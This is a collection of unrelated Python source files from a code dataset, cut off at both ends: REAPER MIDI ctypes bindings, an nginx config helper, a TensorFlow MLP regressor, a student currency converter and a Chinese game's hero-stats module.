t[3])\n return (r, p0, p1, unpacks_l(t[2]), p3)\n\n\ndef MIDI_GetTrackHash(p0, p1, p2, p3):\n a = _RPR._ft['MIDI_GetTrackHash']\n f = ct.CFUNCTYPE(ct.c_byte, ct.c_uint64, ct.c_byte, ct.c_char_p, ct.c_int)(a)\n t = (_RPR.rpr_packp('MediaTrack*', p0),\n ct.c_byte(p1), packs_l(p2), ct.c_int(p3))\n r = f(t[0], t[1], t[2], t[3])\n return (r, p0, p1, unpacks_l(t[2]), p3)\n\n\ndef MIDI_InsertEvt(take, selected, muted, ppqpos, bytestr, bytestr_sz):\n a = _RPR._ft['MIDI_InsertEvt']\n f = ct.CFUNCTYPE(ct.c_byte, ct.c_uint64, ct.c_byte, ct.c_byte, ct.c_double, ct.c_char_p, ct.c_int)(a)\n t = (\n _RPR.rpr_packp('MediaItem_Take*', take),\n ct.c_byte(selected),\n ct.c_byte(muted),\n ct.c_double(ppqpos),\n packs_l(bytestr),\n ct.c_int(bytestr_sz))\n r = f(t[0], t[1], t[2], t[3], t[4], t[5])\n return r\n\n\ndef MIDI_InsertTextSysexEvt(take, selected, muted, ppqpos, type_, bytestr, bytestr_sz):\n a = _RPR._ft['MIDI_InsertTextSysexEvt']\n f = ct.CFUNCTYPE(ct.c_byte, ct.c_uint64, ct.c_byte, ct.c_byte, ct.c_double, ct.c_int, ct.c_char_p, ct.c_int)(a)\n t = (\n _RPR.rpr_packp('MediaItem_Take*', take),\n ct.c_byte(selected),\n ct.c_byte(muted),\n ct.c_double(ppqpos),\n ct.c_int(type_),\n packs_l(bytestr),\n ct.c_int(bytestr_sz))\n r = f(t[0], t[1], t[2], t[3], t[4], t[5], t[6])\n return r\n\n\ndef MIDI_SetEvt(p0, p1, p2, p3, p4, p5, p6, p7):\n a = _RPR._ft['MIDI_SetEvt']\n f = ct.CFUNCTYPE(ct.c_byte, ct.c_uint64, ct.c_int, ct.c_void_p, ct.c_void_p, ct.c_void_p, ct.c_char_p, ct.c_int, ct.c_void_p)(a)\n t = (\n _RPR.rpr_packp('MediaItem_Take*', p0), ct.c_int(p1), ct.c_byte(p2), ct.c_byte(p3),\n ct.c_double(p4), packs_l(p5), ct.c_int(p6), ct.c_byte(p7))\n r = f(t[0], t[1], ct.byref(t[2]), ct.byref(t[3]), ct.byref(t[4]), t[5], t[6], ct.byref(t[7]))\n return (\n r, p0, p1, int(t[2].value), int(t[3].value), float(t[4].value), p5, p6,\n int(t[7].value))","sub_path":"pycfiles/python_reapy-0.6.0-py2.py3-none-any/additional_api.cpython-37.py","file_name":"additional_api.cpython-37.py","file_ext":"py","file_size_in_byte":3469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"92983311","text":"from __future__ import unicode_literals, print_function, division\nfrom veil.profile.installer import *\n\nNGINX_PID_PATH = '/tmp/nginx.pid'\n\n\ndef nginx_program(servers, enable_compression=False, has_bunker=False, is_bunker=False, bunker_ip=None, **kwargs):\n return objectify({\n 'nginx': {\n 'execute_command': 'nginx -c {}'.format(VEIL_ETC_DIR / 'nginx.conf'),\n 'run_as': 'root',\n 'priority': 400,\n 'resources': [('veil.frontend.nginx.nginx_resource', {\n 'servers': servers,\n 'config': dict({\n 'enable_compression': enable_compression,\n 'has_bunker': has_bunker,\n 'is_bunker': is_bunker,\n 'bunker_ip': bunker_ip\n }, **kwargs)\n })]\n }\n })\n\n\ndef nginx_server(server_name, listen, locations, upstreams=None, error_page=None, error_page_dir=None, ssl=False, default_server=False, additional_listens=(),\n **kwargs):\n return {\n server_name: dict({\n 'listen': '{}{}{} ipv6only=off'.format(listen, ' ssl' if ssl else '', ' default_server' if default_server else ''),\n 'additional_listens': additional_listens,\n 'locations': locations,\n 'upstreams': upstreams,\n 'error_page': error_page,\n 'error_page_dir': error_page_dir\n }, **kwargs)\n }\n\n\ndef nginx_reverse_proxy_location(upstream_host, upstream_port):\n return {\n '_': '''\n proxy_pass http://{}:{};\n '''.format(upstream_host, upstream_port)\n }\n","sub_path":"src/veil/frontend/nginx_setting.py","file_name":"nginx_setting.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"73654908","text":"# /bin/env python3\n\nimport os\nimport numpy as np\nimport tensorflow as tf\nfrom sklearn.preprocessing import Imputer, MinMaxScaler\n\nclass MLP():\n def __init__(\n self,\n mse_target=1e-4,\n max_epochs=1000,\n hidden_layer_sizes=None,\n output_fn=tf.identity,\n verbose=False,\n learning_rate=0.001,\n ):\n print(\"init\")\n self.net = None\n self._initialized = False\n\n self.mse_target = mse_target\n self.max_epochs = max_epochs\n self._verbose = verbose\n if hidden_layer_sizes is not None:\n if type(hidden_layer_sizes) is not tuple:\n raise Exception(\"invalid hidden layer architecure\")\n if len(hidden_layer_sizes) <= 0:\n raise Exception(\"invalid hidden layer architecure, length is zero\")\n self.hidden_layer_sizes = hidden_layer_sizes\n self.output_fn = output_fn\n self.learning_rate = learning_rate\n\n def _initializers(self, x_shape, y_shape):\n print(\"initializers\")\n if hasattr(self, \"_initialized\") and self._initialized:\n return\n\n self._x_shape = x_shape\n self._y_shape = y_shape\n\n # Initializers\n sigma = 1\n weight_initializer = tf.variance_scaling_initializer(\n mode=\"fan_avg\",\n distribution=\"uniform\",\n scale=sigma\n )\n bias_initializer = tf.zeros_initializer()\n\n # Data placeholders\n self._X = tf.placeholder(dtype=tf.float32, shape=[None, x_shape[1]])\n self._Y = tf.placeholder(dtype=tf.float32, shape=[None, y_shape[1]])\n\n n_target = y_shape[1]\n\n neurons = [x_shape[1]]\n hiddens = [self._X]\n\n for layer in self.hidden_layer_sizes:\n n_neurons = 0\n activation = None\n if type(layer) is int:\n n_neurons = layer\n activation = tf.nn.relu\n elif type(layer) is tuple:\n if len(layer) != 2:\n raise Exception(\"invalid layer tuple size\")\n n_neurons = layer[0]\n activation = layer[1]\n else:\n raise Exception(\"invalid type of layer\")\n # Layer: Variables for hidden weights and biases\n W_hidden = tf.Variable(\n weight_initializer([neurons[-1], n_neurons])\n )\n neurons.append(n_neurons)\n bias_hidden = tf.Variable(bias_initializer([n_neurons]))\n # Hidden layer\n hiddens.append(\n activation(\n tf.add(tf.matmul(hiddens[-1], W_hidden), bias_hidden)\n )\n )\n\n # Output layer: Variables for output weights and biases\n W_out = tf.Variable(weight_initializer([neurons[-1], n_target]))\n bias_out = tf.Variable(bias_initializer([n_target]))\n\n # Output layer\n self._out = self.output_fn(\n tf.add(tf.matmul(hiddens[-1], W_out), bias_out))\n\n # Cost function\n self._mse = tf.reduce_mean(tf.squared_difference(self._out, self._Y))\n\n # Optimizer\n self._opt = tf.train.AdamOptimizer(\n learning_rate=self.learning_rate,\n ).minimize(self._mse)\n\n # Saver\n self._saver = tf.train.Saver()\n\n # Session\n if not hasattr(self, \"net\") or self.net is None:\n self.net = tf.InteractiveSession()\n\n # Init\n self.net.run(tf.global_variables_initializer())\n\n self._initialized = True\n\n def fit(self, X, y):\n if type(X) is not np.ndarray:\n raise TypeError()\n if type(y) is not np.ndarray:\n raise TypeError()\n if len(X.shape) < 2:\n raise Exception(\"invalid matrix shape\")\n if len(y.shape) < 2:\n raise Exception(\"invalid matrix shape\")\n self._initializers(X.shape, y.shape)\n\n # Build train and test data set\n train_start = 0\n train_end = int(np.floor(0.8 * X.shape[0]))\n test_start = train_end + 1\n test_end = X.shape[0]\n X_data_train = X[np.arange(train_start, train_end), :]\n X_test = X[np.arange(test_start, test_end), :]\n y_data_train = y[np.arange(train_start, train_end), :]\n y_test = y[np.arange(test_start, test_end), :]\n\n # Fit neural net\n batch_size = 256\n mse_train = []\n mse_test = []\n\n mse_actual = np.finfo(np.float32).max\n epochs = 0\n\n while mse_actual > self.mse_target and epochs < self.max_epochs:\n # Shuffle training data\n shuffle_indices = np.random.permutation(\n np.arange(X_data_train.shape[0]))\n X_train = X_data_train[shuffle_indices]\n y_train = y_data_train[shuffle_indices]\n\n if X.shape[0] <= batch_size:\n self.net.run(\n self._opt,\n feed_dict={self._X: X_train, self._Y: y_train})\n mse_train.append(\n self.net.run(\n self._mse,\n feed_dict={self._X: X_train, self._Y: y_train}))\n mse_test.append(\n self.net.run(\n self._mse,\n feed_dict={self._X: X_test, self._Y: y_test}))\n mse_actual = mse_train[-1]\n\n if np.mod(epochs, 50) == 0 and self._verbose:\n print(\"Epoch:\", epochs)\n print('MSE Train:', mse_train[-1])\n print('MSE Test:', mse_test[-1])\n else:\n # Minibatch training\n for i in range(0, X.shape[0] // batch_size):\n start = i * batch_size\n batch_x = X_train[start:start + batch_size]\n batch_y = y_train[start:start + batch_size]\n # Run optimizer with batch\n self.net.run(\n self._opt,\n feed_dict={self._X: batch_x, self._Y: batch_y})\n mse_train.append(\n self.net.run(\n self._mse,\n feed_dict={self._X: X_train, self._Y: y_train}))\n mse_test.append(\n self.net.run(\n self._mse,\n eed_dict={self._X: X_test, self._Y: y_test}))\n mse_actual = mse_train[-1]\n\n if np.mod(epochs, 50) == 0 and self._verbose:\n print(\"Epoch:\", epochs)\n print('MSE Train:', mse_train[-1])\n print('MSE Test:', mse_test[-1])\n\n epochs += 1\n self.mse_train = mse_train\n self.mse_test = mse_test\n return self\n\n def score(self, X, y_true):\n \"\"\" R^2 coefficient\n The best possible score is 1.0 and it can be negative\n (because the model can be arbitrarily worse). A constant\n model that always predicts the expected value of y,\n disregarding the input features, would get a R^2 score of 0.0.\n (from sklearn documentation)\n \"\"\"\n if not self._initialized:\n raise Exception(\"Not initialized. Run fit first.\")\n if type(X) is not np.ndarray:\n raise TypeError()\n if type(y_true) is not np.ndarray:\n raise TypeError()\n if len(X.shape) < 2:\n raise Exception(\"invalid matrix shape\")\n if len(y_true.shape) < 2:\n raise Exception(\"invalid matrix shape\")\n y_pred = self.net.run(self._out, feed_dict={self._X: X})\n u = ((y_true - y_pred) ** 2).sum()\n v = ((y_true - y_true.mean()) ** 2).sum()\n return (1 - u/v)\n\n def predict(self, X):\n if not self._initialized:\n raise Exception(\"Not initialized. Run fit first.\")\n if type(X) is not np.ndarray:\n raise TypeError()\n if len(X.shape) < 2:\n raise Exception(\"invalid matrix shape\")\n # Prediction\n pred = self.net.run(self._out, feed_dict={self._X: X})\n return pred\n\n def save(self, filename):\n fname = os.path.basename(filename)\n directory = os.path.dirname(filename)\n _, file_extension = os.path.splitext(filename)\n if directory != \"\":\n directory += \"/\"\n model_path = directory + fname + \".tfmodel\" \n self._model_path = model_path\n import pickle\n with open(filename, mode='wb') as outfile:\n pickle.dump(self, outfile, protocol=4)\n\n def load(self, filename):\n import pickle\n with open(filename, mode='rb') as f:\n rna = pickle.load(f)\n self.__dict__.update(rna.__dict__)\n self._initializers(self._x_shape, self._y_shape)\n \n def _save_tf(self, model_file=\"\"):\n if model_file == \"\":\n model_file = self._model_path\n #path = os.path.abspath(model_file)\n if not os.path.isdir(model_file):\n os.mkdir(model_file)\n model_file = model_file + \"/\"\n self._save_path = self._saver.save(self.net, model_file)\n \n def _load_tf(self, model_file=\"\"):\n if model_file == \"\":\n model_file = self._save_path\n self._saver.restore(self.net, model_file)\n\n def _serialize_hidden_layers(self, hidden):\n out = []\n for h in hidden:\n if type(h) is tuple:\n if len(h) != 2:\n raise Exception(\"invalid hidden layer tuple\")\n if type(h[0]) is not int:\n raise Exception(\"invalid hidden layer neurons number\")\n if not hasattr(h[1], '__call__'):\n raise Exception(\"invalid hidden layer activation function\")\n out.append([h[0], _ser_fn_activation(h[1])])\n elif type(h) is int:\n out.append(h)\n else:\n raise Exception(\"invalid type\")\n return tuple(out)\n\n def _unserialize_hidden_layers(self, hidden):\n out = []\n for h in hidden:\n if type(h) is list:\n if len(h) != 2:\n raise Exception(\"invalid hidden layer tuple\")\n if type(h[0]) is not int:\n raise Exception(\"invalid hidden layer neurons number\")\n if type(h[1]) is not str:\n raise Exception(\"invalid hidden layer activation function\")\n out.append(tuple([h[0], _unser_fn_activation(h[1])]))\n elif type(h) is int:\n out.append(h)\n else:\n raise Exception(\"invalid type:\", type(h))\n return tuple(out)\n\n def __getstate__(self):\n print(\"getstate\")\n if not self._initialized:\n raise Exception(\"Not initialized. Run fit first.\")\n state = {\n \"mse_target\": self.mse_target,\n \"max_epochs\": self.max_epochs,\n \"_verbose\": self._verbose,\n \"_x_shape\": self._x_shape,\n \"_y_shape\": self._y_shape,\n \"mse_train\": self.mse_train,\n \"mse_test\": self.mse_test,\n \"hidden_layer_sizes\":\n self._serialize_hidden_layers(self.hidden_layer_sizes),\n \"output_fn\": _ser_fn_activation(self.output_fn),\n \"learning_rate\": self.learning_rate,\n }\n if hasattr(self, \"_model_path\"):\n self._save_tf()\n state[\"_model_path\"] = self._model_path\n state[\"_save_path\"] = self._save_path\n else:\n print(\"### No path to save the model\")\n return state\n\n def __setstate__(self, state):\n print(\"setstate\")\n # Restore instance attributes (i.e., filename and lineno).\n hl = self._unserialize_hidden_layers(state[\"hidden_layer_sizes\"])\n state[\"hidden_layer_sizes\"] = hl\n state[\"output_fn\"] = _unser_fn_activation(state[\"output_fn\"])\n self.__dict__.update(state)\n # Restore the previously opened file's state. To do so, we need to\n # reopen it and read from it until the line count is restored.\n if hasattr(self, \"_save_path\"):\n # Session\n if not hasattr(self, \"net\") or self.net is None:\n self.net = tf.InteractiveSession()\n # Saver\n self._saver = tf.train.Saver()\n # Load model\n self._load_tf()\n else:\n self._initializers(self._x_shape, self._y_shape)\n print(\"### no model to load\")\n\n def __enter__(self):\n print(\"enter\")\n self._initialized = False\n if not hasattr(self, \"net\") or self.net is None:\n self.net = tf.InteractiveSession()\n return self\n\n def __exit__(self, exc_type, exc_value, traceback):\n print(\"exit\")\n if hasattr(self, \"net\"):\n self.net.close()\n\n def close(self):\n \"\"\"\" \n Closes the RNA.\n Closes the underlay session with TensorFlow.\n \"\"\"\n if hasattr(self, \"net\") and self.net is not None:\n self.net.close()\n\n\ndef _ser_fn_activation(fn):\n \"\"\"\n Return the name of one function.\n \"\"\"\n # if fn is tf.nn.relu:\n # return \"relu\"\n # elif tf.nn.sigmoid.__name__:\n # return \"sigmoid\"\n # raise Exception(\"function unknown, can't serialize\")\n return fn.__name__\n\n\ndef _unser_fn_activation(name):\n \"\"\"\n Return the function with name.\n \"\"\"\n if name == \"relu\":\n return tf.nn.relu\n elif name == \"sigmoid\":\n return tf.nn.sigmoid\n elif name == \"identity\":\n return tf.identity\n elif name == \"round\":\n return tf.round\n raise Exception(\"unknown function\")\n\ndef _make_matrix_classes(y):\n y_max = max(y)[0]\n out = np.zeros((y.shape[0], y_max + 1), dtype=int)\n for i in range(out.shape[0]):\n out[i, y[i]] = 1\n return out\n\nif __name__ == '__main__':\n from sklearn.datasets import load_iris\n from sklearn.datasets import load_linnerud\n from sklearn.model_selection import StratifiedKFold\n from sklearn.model_selection import ShuffleSplit\n\n # with MLP(\n # mse_target=1e-4,\n # max_epochs=100000,\n # hidden_layer_sizes=(16, 100, (12, tf.nn.sigmoid)),\n # output_fn=tf.nn.sigmoid,\n # verbose=False,\n # ) as rna:\n # iris = load_iris()\n\n # skf = StratifiedKFold(n_splits=4)\n # train_index, test_index = next(iter(skf.split(iris.data, iris.target)))\n\n # X_train = iris.data[train_index]\n # y_train = iris.target[train_index]\n # X_test = iris.data[test_index]\n # y_test = iris.target[test_index]\n\n # X_train = np.array(X_train)\n # y_train = np.array(y_train)\n # X_test = np.array(X_test)\n # y_test = np.array(y_test)\n\n # y_train = np.reshape(y_train, (y_train.shape[0], 1))\n # y_test = np.reshape(y_test, (y_test.shape[0], 1))\n\n # y_train = _make_matrix_classes(y_train)\n # y_test = _make_matrix_classes(y_test)\n\n # rna.fit(X_train, y_train)\n # y_pred = rna.predict(X_test)\n # s = rna.score(X_test, y_test)\n # print(\"score: {}\".format(s))\n \n with MLP(\n mse_target=1e-8,\n max_epochs=1e8,\n hidden_layer_sizes=(6, 30, 30, 6),\n output_fn=tf.nn.sigmoid,\n verbose=True,\n learning_rate=1e-6,\n ) as rna:\n linnerud = load_linnerud()\n\n ss = ShuffleSplit()\n train_index, test_index = next(iter(ss.split(linnerud.data)))\n\n X_train = linnerud.data[train_index]\n y_train = linnerud.target[train_index]\n X_test = linnerud.data[test_index]\n y_test = linnerud.target[test_index]\n\n X_train = np.array(X_train)\n y_train = np.array(y_train)\n X_test = np.array(X_test)\n y_test = np.array(y_test)\n\n norm_x = MinMaxScaler(feature_range=(0.0, 1.0), copy=True)\n norm_y = MinMaxScaler(feature_range=(0.0, 1.0), copy=True)\n\n X_train = norm_x.fit_transform(X_train)\n X_test = norm_x.transform(X_test)\n y_train = norm_y.fit_transform(y_train)\n y_test = norm_y.transform(y_test)\n\n rna.fit(X_train, y_train)\n s = rna.score(X_test, y_test)\n print(\"score: {}\".format(s))\n \n y_pred = rna.predict(X_test)\n print(norm_y.inverse_transform(y_test))\n print(norm_y.inverse_transform(y_pred))\n rna.save(\"mlp.model\")\n\n with MLP() as rna:\n rna.load(\"mlp.model\")\n y_pred = rna.predict(X_test)\n print(norm_y.inverse_transform(y_pred))\n","sub_path":"mlp/mlp.py","file_name":"mlp.py","file_ext":"py","file_size_in_byte":16655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"536613156","text":"'''\r\nKurt Burdick\r\n3/2/2017\r\nProject #1 - A banking program to simulate currency conversions\r\nCode that does currency conversions between US, EU, and CD\r\nand applies a fee for the type of transaction choosen\r\n'''\r\n\r\ndef main():\r\n\r\n end=\"go\"\r\n \r\n while(end!=\"quit\"):\r\n print('Currencies Available For Conversions Are: (1)US (2)EU and (3)CD')\r\n \r\n currentmoney=int(input('Enter the number for your Current Money: '))\r\n \r\n while(not(currentmoney==1 or currentmoney==2 or currentmoney==3)):\r\n print('Error, Please Enter a Valid Currency.')\r\n currentmoney=int(input('Enter the number for your Current Money: '))\r\n \r\n desiredmoney=int(input('Enter the number for your Desired Money: '))\r\n \r\n while(not(desiredmoney==1 or desiredmoney==2 or desiredmoney==3)or desiredmoney==currentmoney):\r\n print('Error, Please Enter a Valid Currency, or A Conversion is Required.')\r\n desiredmoney=int(input('Enter the number for your Desired Money: '))\r\n \r\n amount=float(input('Enter the Amount of money that you want to Convert: '))\r\n \r\n while(amount<=0):\r\n print('Error, Please Reenter a Valid Amount.')\r\n amount=float(input('Enter the Amount of Money you want to Convert: '))\r\n \r\n while(currentmoney!=desiredmoney and amount>0):\r\n amount=amount\r\n result=0\r\n \r\n if(currentmoney==1 and desiredmoney==2):\r\n result=(amount*.88)\r\n \r\n elif(currentmoney==1 and desiredmoney==3):\r\n result=(amount*1.29)\r\n \r\n elif(currentmoney==2 and desiredmoney==1):\r\n result=(amount*1.13)\r\n \r\n elif(currentmoney==2 and desiredmoney==3):\r\n result=(amount*1.46)\r\n \r\n elif(currentmoney==3 and desiredmoney==1):\r\n result=(amount*.78)\r\n \r\n elif(currentmoney==3 and desiredmoney==2):\r\n result=(amount*.69)\r\n \r\n transaction=int(input('Enter the number for the type of transction desired: (1)Check (2)Cash: '))\r\n while(transaction!=1 and transaction!=2):\r\n print('Please Reenter Valid Input')\r\n transaction=int(input('Enter the number for the type of transction desired: (1)Check (2)Cash: '))\r\n \r\n if(transaction==1):\r\n fee=0.01\r\n \r\n elif(transaction==2):\r\n fee=0.05\r\n \r\n totalfee=fee*amount\r\n \r\n if(currentmoney==1):\r\n currentmoney=\"US\"\r\n \r\n elif(currentmoney==2):\r\n currentmoney=\"EU\"\r\n \r\n elif(currentmoney==3):\r\n currentmoney=\"CD\"\r\n \r\n if(desiredmoney==1):\r\n desiredmoney=\"US\"\r\n \r\n elif(desiredmoney==2):\r\n desiredmoney=\"EU\"\r\n \r\n elif(desiredmoney==3):\r\n desiredmoney=\"CD\"\r\n \r\n print(\"Total Fee: \"+str(totalfee))\r\n print(\"Current Money: \"+str(amount)+\" \"+str(currentmoney))\r\n print(\"Received Money: \"+str(result)+\" \"+str(desiredmoney))\r\n amount=0\r\n \r\n end=input('Enter \"quit\" to end program or nothing to continue: ')\r\n\r\nmain()\r\n\r\n\r\n","sub_path":"currency_converter.py","file_name":"currency_converter.py","file_ext":"py","file_size_in_byte":3539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"597390721","text":"# -*- coding: utf-8 -*-\n\n__author__ = 'Wang Chao'\n__date__ = '12/30/13'\n\n\nfrom mongoengine import DoesNotExist\nfrom core.mongoscheme import MongoHero, MongoAchievement, MongoHeroSoul, MongoCharacter\nfrom core.signals import hero_add_signal, hero_changed_signal, hero_step_up_signal, hero_to_soul_signal\nfrom core.formation import Formation\nfrom core.exception import SanguoException\nfrom core.resource import Resource\nfrom utils import cache\nfrom core.msgpipe import publish_to_char\nfrom utils import pack_msg\nfrom utils.functional import id_generator\nfrom preset.settings import HERO_MAX_STEP, HERO_START_STEP, HERO_STEP_UP_SOCKET_AMOUNT\nfrom preset.data import HEROS, ACHIEVEMENTS, MONSTERS\nfrom preset import errormsg\nimport protomsg\n\nfrom dll import external_calculate\n\ndef char_heros_dict(char_id):\n heros = MongoHero.objects.filter(char=char_id)\n return {h.id: h for h in heros}\n\ndef char_heros_obj(char_id):\n heros = char_heros_dict(char_id)\n return [Hero.cache_obj(i) for i in heros.keys()]\n\n\ndef cal_hero_property(original_id, level, step):\n \"\"\"\n\n @param original_id: hero original id\n @type original_id: int\n @param level: hero level (char level)\n @type level: int\n @return: (attack, defense, hp)\n @rtype: tuple\n \"\"\"\n hero = HEROS[original_id]\n\n attack = external_calculate.Hero.attack(level, step, hero.quality, hero.attack_growing)\n defense = external_calculate.Hero.defense(level, step, hero.quality, hero.defense_growing)\n hp = external_calculate.Hero.hp(level, step, hero.quality, hero.hp_growing)\n\n return attack, defense, hp\n\n\ndef cal_monster_property(oid, level):\n monster = MONSTERS[oid]\n\n attack = external_calculate.Hero.attack(level, 0, monster.quality, monster.attack)\n defense = external_calculate.Hero.defense(level, 0, monster.quality, monster.defense)\n hp = external_calculate.Hero.hp(level, 0, monster.quality, monster.hp)\n\n return attack, defense, hp\n\n\nclass FightPowerMixin(object):\n @property\n def power(self):\n a = self.attack * 2.5 * (1 + self.crit / 200.0)\n # b = (self.hp + self.defense * 5) * (1 + self.dodge / 2.0)\n b = self.hp + self.defense * 5\n return int(a + b)\n\n\nclass Hero(FightPowerMixin):\n def __init__(self, hid):\n self.hero = MongoHero.objects.get(id=hid)\n char = MongoCharacter.objects.get(id=self.hero.char)\n\n self.id = hid\n self.oid = self.hero.oid\n self.step = self.hero.step\n self.progress = self.hero.progress\n self.level = char.level\n self.char_id = char.id\n\n self.attack, self.defense, self.hp = \\\n cal_hero_property(self.oid, self.level, self.step)\n\n self.model_hero = HEROS[self.oid]\n self.crit = self.model_hero.crit\n self.dodge = self.model_hero.dodge\n self.anger = self.model_hero.anger\n\n self.default_skill = self.model_hero.default_skill\n\n self.skills = [int(i) for i in self.model_hero.skills.split(',')]\n\n self._add_equip_attrs()\n self._add_achievement_buffs()\n\n def _add_equip_attrs(self):\n from core.item import Equipment\n f = Formation(self.char_id)\n socket = f.find_socket_by_hero(self.id)\n if not socket:\n return\n\n # 先把装备数值加到人物上\n equipments = []\n for x in ['weapon', 'armor', 'jewelry']:\n equip_id = getattr(socket, x)\n if equip_id:\n equip = Equipment(self.char_id, equip_id)\n self.attack += equip.attack\n self.defense += equip.defense\n self.hp += equip.hp\n\n equipments.append(equip)\n\n # 然后加成人��的专属装备\n additions = {}\n special_equipments = self.model_hero.special_equipments\n if special_equipments:\n for equip in equipments:\n _cls = equip.equip.cls\n if _cls not in special_equipments:\n continue\n\n _tp = equip.equip.tp\n additions[_tp] = additions.get(_tp, 0) + special_equipments[_cls]\n\n for _tp, _add_percent in additions.items():\n if _tp == 1:\n # attack\n self.attack *= (1 + _add_percent / 100.0)\n elif _tp == 2:\n # defense\n self.defense *= (1 + _add_percent / 100.0)\n else:\n # hp\n self.hp *= (1 + _add_percent / 100.0)\n self.hp = int(self.hp)\n\n # 最后再把宝石加上\n for equip in equipments:\n for k, v in equip.gem_attributes.iteritems():\n value = getattr(self, k)\n setattr(self, k, value + v)\n\n\n def _add_achievement_buffs(self):\n try:\n mongo_ach = MongoAchievement.objects.get(id=self.char_id)\n except DoesNotExist:\n return\n\n buffs = {}\n for i in mongo_ach.complete:\n ach = ACHIEVEMENTS[i]\n if not ach.buff_used_for:\n continue\n\n buffs[ach.buff_used_for] = buffs.get(ach.buff_used_for, 0) + ach.buff_value\n\n for k, v in buffs.iteritems():\n value = getattr(self, k)\n if k == 'crit':\n new_value = value + v / 100\n else:\n new_value = value * (1 + v / 10000.0)\n\n new_value = int(new_value)\n setattr(self, k, new_value)\n\n\n def save_cache(self):\n cache.set('hero:{0}'.format(self.id), self)\n\n @staticmethod\n def cache_obj(hid):\n h = cache.get('hero:{0}'.format(hid))\n if h:\n return h\n\n h = Hero(hid)\n h.save_cache()\n return h\n\n\n @property\n def max_socket_amount(self):\n # 当前升阶全部孔数\n if self.step >= HERO_MAX_STEP:\n return 0\n return HERO_STEP_UP_SOCKET_AMOUNT[self.step]\n\n @property\n def current_socket_amount(self):\n # 当前已经点亮的孔数\n return self.hero.progress\n\n\n def step_up(self):\n # 升阶\n if self.step >= HERO_MAX_STEP:\n raise SanguoException(\n errormsg.HERO_REACH_MAX_STEP,\n self.char_id,\n \"Hero Step Up\",\n \"Hero {0} reach max step {1}\".format(self.id, HERO_MAX_STEP)\n )\n\n resource_needs = {}\n cost_gold = external_calculate.Hero.step_up_using_gold(self.model_hero.quality)\n\n resource_needs['gold'] = -cost_gold\n soul_needs_amount = external_calculate.Hero.step_up_using_soul_amount(self.model_hero.quality)\n\n hs = HeroSoul(self.char_id)\n self_soul_amount = hs.soul_amount(self.oid)\n\n common_soul_needs = soul_needs_amount - self_soul_amount\n if common_soul_needs <= 0:\n # don't need common soul\n resource_needs['souls'] = [(self.oid, soul_needs_amount)]\n else:\n # need common soul\n resource_needs['stuffs'] = [(22, common_soul_needs)]\n\n resource = Resource(self.char_id, \"Hero Step Up\", 'step up {0}'.format(self.id))\n try:\n resource.check_and_remove(**resource_needs)\n except SanguoException as e:\n if e.error_id == errormsg.SOUL_NOT_ENOUGH or e.error_id == errormsg.STUFF_NOT_ENOUGH:\n raise SanguoException(\n errormsg.HERO_STEP_UP_ALL_NOT_ENOUGH,\n self.char_id,\n \"Hero Step Up\",\n \"soul not enough\"\n )\n raise e\n\n # 扣完东西了,开始搞一次\n self.hero.progress += 1\n if self.hero.progress >= self.max_socket_amount:\n # 真正的升阶\n # 否则仅仅是记录当前状态\n self.hero.step += 1\n self.hero.progress = 0\n\n hero_step_up_signal.send(\n sender=None,\n char_id=self.char_id,\n hero_id=self.id,\n new_step=self.hero.step\n )\n\n self.step = self.hero.step\n self.hero.save()\n hero_changed_signal.send(\n sender=None,\n hero_id=self.id\n )\n\n\nclass HeroSoul(object):\n def __init__(self, char_id):\n self.char_id = char_id\n try:\n self.mongo_hs = MongoHeroSoul.objects.get(id=self.char_id)\n except DoesNotExist:\n self.mongo_hs = MongoHeroSoul(id=self.char_id)\n self.mongo_hs.souls = {}\n self.mongo_hs.save()\n\n def soul_amount(self, _id):\n return self.mongo_hs.souls.get(str(_id), 0)\n\n def has_soul(self, _id, amount=1):\n return self.soul_amount(_id) >= amount\n\n def add_soul(self, souls):\n new_souls = []\n update_souls = []\n for _id, amount in souls:\n str_id = str(_id)\n if str_id in self.mongo_hs.souls:\n self.mongo_hs.souls[str_id] += amount\n update_souls.append((_id, self.mongo_hs.souls[str_id]))\n else:\n self.mongo_hs.souls[str_id] = amount\n new_souls.append((_id, amount))\n\n self.mongo_hs.save()\n if new_souls:\n msg = protomsg.AddHeroSoulNotify()\n for _id, amount in new_souls:\n s = msg.herosouls.add()\n s.id = _id\n s.amount = amount\n\n publish_to_char(self.char_id, pack_msg(msg))\n\n if update_souls:\n msg = protomsg.UpdateHeroSoulNotify()\n for _id, amount in update_souls:\n s = msg.herosouls.add()\n s.id = _id\n s.amount = amount\n\n publish_to_char(self.char_id, pack_msg(msg))\n\n\n def remove_soul(self, souls):\n remove_souls = []\n update_souls = []\n for _id, amount in souls:\n if not self.has_soul(_id, amount):\n raise SanguoException(\n errormsg.SOUL_NOT_ENOUGH,\n self.char_id,\n \"HeroSoul Remove\",\n \"HeroSoul {0} not enough/exist, expected amount {1}\".format(_id, amount)\n )\n\n for _id, amount in souls:\n str_id = str(_id)\n self.mongo_hs.souls[str_id] -= amount\n if self.mongo_hs.souls[str_id] <= 0:\n remove_souls.append(_id)\n self.mongo_hs.souls.pop(str_id)\n else:\n update_souls.append((_id, self.mongo_hs.souls[str_id]))\n\n self.mongo_hs.save()\n if remove_souls:\n msg = protomsg.RemoveHeroSoulNotify()\n msg.ids.extend(remove_souls)\n\n publish_to_char(self.char_id, pack_msg(msg))\n\n if update_souls:\n msg = protomsg.UpdateHeroSoulNotify()\n for _id, amount in update_souls:\n s = msg.herosouls.add()\n s.id = _id\n s.amount = amount\n\n publish_to_char(self.char_id, pack_msg(msg))\n\n\n def purge_soul(self, _id):\n self.mongo_hs.souls.pop(str(_id))\n self.mongo_hs.save()\n\n msg = protomsg.RemoveHeroSoulNotify()\n msg.ids.append(_id)\n publish_to_char(self.char_id, pack_msg(msg))\n\n\n def send_notify(self):\n msg = protomsg.HeroSoulNotify()\n for _id, amount in self.mongo_hs.souls.iteritems():\n s = msg.herosouls.add()\n s.id = int(_id)\n s.amount = amount\n\n publish_to_char(self.char_id, pack_msg(msg))\n\nclass _SaveHeroResult(object):\n __slots__ = ['id_range', 'actual_heros', 'to_souls']\n\nclass 